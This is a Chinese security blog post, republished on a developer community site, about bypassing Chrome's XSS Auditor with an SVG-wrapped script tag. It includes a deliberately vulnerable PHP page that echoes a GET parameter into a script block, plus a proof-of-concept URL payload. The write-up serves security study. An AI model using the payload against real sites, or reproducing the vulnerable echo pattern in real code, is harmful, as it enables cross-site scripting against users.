前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >Chrome XSS Auditor Bypass Using SVG

Chrome XSS Auditor Bypass Using SVG

作者头像
phith0n
发布于 2020-10-15 02:42:05
发布于 2020-10-15 02:42:05
73200
代码可运行
举报
运行总次数:0
代码可运行

除了之前MK发布的一个bypass方法外(https://twitter.com/avlidienbrunn/status/486059626002395136),大牛们也陆续想出来一些针对性的绕过方法。我说的这个出自:http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/

应用场景出现在,输出点在<script>中的引号中,不能闭合引号(如使用了addslashes转义),但可以用</script>闭合整个script标签。

我写了一个应用场景:http://mhz.pw/game/audit/xss.php?name=test ,源码如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8"/>
<title>xss auditor test</title>
<script>
var name = "<?php echo addslashes($_GET['name']); ?>";
</script>
</head>
<body>
<h2>Hello world</h2>
</body>
</html>

这个场景其实是很常见的,如全局GPC但没有htmlspecialchars的网站。

我们不能够闭合双引号,但可以闭合前面的<script>,如:

可见HTML已经渲染上去了,但只是XSS被chrome audit拦截。插入的<script>也是:

绕过方式:利用<svg>,将后面插入的<script>当做svg语言的一个元素执行。POC如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://mhz.pw/game/audit/xss.php?name=test%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1);//

成功执行:

其实最后组合成的HTML代码如下:

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
浏览器安全一 / Chrome XSS Auditor bypass
(2017-08-14 更新,chrome57更新了xss auditor的拦截方式,之前的大量payload不能用了)
phith0n
2020/10/15
6080
CRLF攻击原理介绍和使用
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
全栈工程师修炼指南
2020/10/23
7.3K0
CRLF攻击原理介绍和使用
一篇文章带你从XSS入门到进阶(附Fuzzing+BypassWAF+Payloads)
OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。
陈殷
2020/03/06
4.9K0
通过主机标头的 XSS
在 IE 中处理重定向时有一个有趣的错误,它可以将任意字符插入到 Host 标头中。假设您有以下 http 响应:
Khan安全团队
2022/01/11
1.6K0
XSS相关Payload及Bypass的备忘录(下)| 文末有打包好的Payload
上述payload都打包在了下面链接中,自己现行研究一番,在哪里使用,可以做些模糊测试工作,具体自己研究研究吧,最后 全部.txt 是我将其中的payload都复制到了里面,但是有些地方不足,可以自己修改下吧。失效可联系我,不保证能够秒回,着急就加我微信。嘿嘿。
Power7089
2019/08/01
2.4K0
XSS相关Payload及Bypass的备忘录(下)| 文末有打包好的Payload
通过DVWA学习XSS
简介 这篇文章通过 dvwa 简单研究了三种类型的 xss,并且讲述了如何利用 xss 获取目标网站用户的 cookie。 dvwa反射型xss 测试环境 一台 win200
奶糖味的代言
2018/04/16
5.5K0
通过DVWA学习XSS
有趣的cdn bypass CSP
最近在逛github的时候看到一个bypass csp的挑战,也是我最近才知道的一个新思路,一般人bypass csp都是通过允许域下的某个漏洞构造文件绕过,但是其实往往没人注意到cdn的问题。
LoRexxar
2023/02/21
8630
有趣的cdn bypass CSP
XSS挖掘工具资源分享
网e渗透安全部
2024/05/18
1470
XSS挖掘工具资源分享
Web安全攻防入门系列 | 跨站脚本攻击和防范技巧 | 只看这一篇文章就够了
跨站脚本攻击(XSS)是客户端安全的头号大敌,OWASP TOP 10多次把xss列在榜首。
Java程序猿
2023/04/17
2.1K0
CRLF (%0D%0A) Injection
当浏览器向Web服务器发送请求时,Web服务器用包含HTTP响应标头和实际网站内容(即响应正文)的响应进行答复。HTTP标头和HTML响应(网站内容)由特殊字符的特定组合分隔,即回车符和换行符。简而言之,它们也称为CRLF。
黑伞安全
2020/11/09
6K0
CRLF (%0D%0A) Injection
米斯特白帽培训讲义(v2)漏洞篇 XSS
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS 。恶意攻击者往 Web 页面里插入恶意 JavaScript 代码,当用户浏览器该页之时,嵌入 Web 页面里的代码会被执行,从而达到恶意攻击用户的目的。
ApacheCN_飞龙
2019/02/15
5760
米斯特白帽培训讲义(v2)漏洞篇 XSS
XSS备忘录
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
Ms08067安全实验室
2020/02/19
1.7K0
XSS备忘录
pwnhub 改行做前端
题目说实话是完成了一半,后一半是无意中上车的,有一些迷…关于注入部分是后来才发现的。
LoRexxar
2023/02/21
2190
pwnhub 改行做前端
新手指南:DVWA-1.9全级别教程(完结篇,附实例)之XSS
* 本文原创作者:lonehand,转载请注明来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。 DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助w
FB客服
2018/02/09
7.4K0
新手指南:DVWA-1.9全级别教程(完结篇,附实例)之XSS
干货 | 各种WAF绕过手法学习
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
Power7089
2021/04/30
4K0
TCTF/0CTF2018 XSS Writeup
刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。
Seebug漏洞平台
2018/04/19
3.8K1
TCTF/0CTF2018 XSS Writeup
TCTF/0CTF2018 XSS Writeup
刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。 其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过 strict-dynamic CSP的利用方式。 h4xors.club2则是通过Script Gadgets和postmessage中间人来实现利用。 h4x0rs.space提及了Appcache以及Service worker配合jsonp接口实现的利用思路。 其中的很多利用思路非常精巧,值得研究。所以我花费了大量时间复现其中题目的思路以及环境,希望能给读者带来更多东西...
Seebug漏洞平台
2018/07/26
1.1K0
TCTF/0CTF2018 XSS Writeup
wwwxml400com请拨18608765024bee-box之XSS攻击
一个月前刷了XSSchalleng以为自己已经算是入门了XSS了,但是在我挖洞碰到有可能存在XSS漏洞网页的时候,发现我只能记起来<script>alert('xss')</script>
用户7106032
2020/03/21
6740
XSS-LOADER 一款xss生成、扫描器
最近好像一直在鸽,主要是实验室最近有点忙,项目忙不过来,给各位观众老爷说声抱歉。今天介绍的是一款xss工具。XSS-LOADER
鸿鹄实验室
2021/04/15
1.1K0
XSS-LOADER 一款xss生成、扫描器
XSS靶场攻关笔记
通过GET方法,将name的值赋值为变量$srt并将其直接输出。 即!如果name=<script>alert()</script>时,将会把结果直接输出。 构造POC
逍遥子大表哥
2021/12/19
6340
XSS靶场攻关笔记
相关推荐
浏览器安全一 / Chrome XSS Auditor bypass
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验